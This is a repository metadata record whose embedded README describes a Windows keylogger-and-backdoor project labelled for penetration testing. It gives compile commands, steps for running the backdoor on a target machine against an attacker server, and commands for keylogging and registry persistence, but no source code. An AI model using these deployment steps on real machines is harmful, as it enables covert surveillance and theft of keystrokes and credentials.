{"id":27129206,"url":"https://github.com/gotz1480/keylogger","last_synced_at":"2025-04-07T19:22:26.971Z","repository":{"id":125834322,"uuid":"455181617","full_name":"gotz1480/keylogger","owner":"gotz1480","description":"Keylogger malware for penetration testing in Windows platforms","archived":false,"fork":false,"pushed_at":"2022-02-05T06:27:04.000Z","size":35,"stargazers_count":2,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-04T13:13:19.224Z","etag":null,"topics":["backdoor","backdoor-attacks","backdooring","keylogger","malware","pentest","pentesting"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/gotz1480.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-02-03T13:45:29.000Z","updated_at":"2024-07-03T05:22:24.000Z","dependencies_parsed_at":null,"dependency_job_id":"da303876-43d2-4419-84dc-d02dc2848a75","html_url":"https://github.com/gotz1480/keylogger","commit_stats":null,"previous_names":["gotz1480/keylogger"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gotz1480%2Fkeylogger","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gotz1480%2Fkeylogger/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gotz1480%2Fkeylogger/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/gotz1480%2Fkeylogger/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/gotz1480","download_url":"https://codeload.github.com/gotz1480/keylogger/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247713434,"owners_count":20983714,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","backdoor-attacks","backdooring","keylogger","malware","pentest","pentesting"],"created_at":"2025-04-07T19:22:26.267Z","updated_at":"2025-04-07T19:22:26.952Z","avatar_url":"https://github.com/gotz1480.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# keylogger\n\nKeylogger malware for penetration testing in Windows platforms. PLEASE USE WITH RESPONSABILITY. I AM NOT RESPONSABLE FOR MISUSE OF THIS SOFTWARE FOR ILLEGAL PURPOSES.\n\n## Steps\n\n1. Create connection with server (inside a main function)\n2. Create shell function (wait for incoming command and iterate over certain options)\n3. Automatically start program when machine is rebooted\n4. Start/spawn other programs\n5. Navigate through different directories\n6. Implement keylogger to backdoor\n\n## Compiling backdoor\n\n### Install mingw\n\n`sudo apt-get install mingw-w64`\n\n### Win32\n\n`i686-w64-mingw32-gcc -o backdoor_win32.exe backdoor.c -lwsock32 -lwininet`\n\n### Win64\n\n`x86_64-w64-mingw32-gcc -o backdoor_win64.exe backdoor.c -lwsock32 -lwininet`\n\n## Compiling server\n\n`gcc server.c -o server.o`\n\n## Usage\n\nReplace in both `server.c` and `backdoor.c` files the server IP address (the attacker) \"xxx.xxx.x.xx\" with the actual IP address, which can be retrieved using `ifconfig`.\n\nAfter compiling, run `backdoor_win32.exe` or `backdoor_win64.exe` in the target machine, preferably Windows 7. On a Linux machine, preferably Kali Linux, run `server.o`.\n\n### Commands\n\n`keylog_start` - starts keylogger in target machine \u003cbr\u003e\n`persist` - creates persistence in target machine registry \u003cbr\u003e\n`q` - quit \u003cbr\u003e\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgotz1480%2Fkeylogger","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fgotz1480%2Fkeylogger","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fgotz1480%2Fkeylogger/lists"}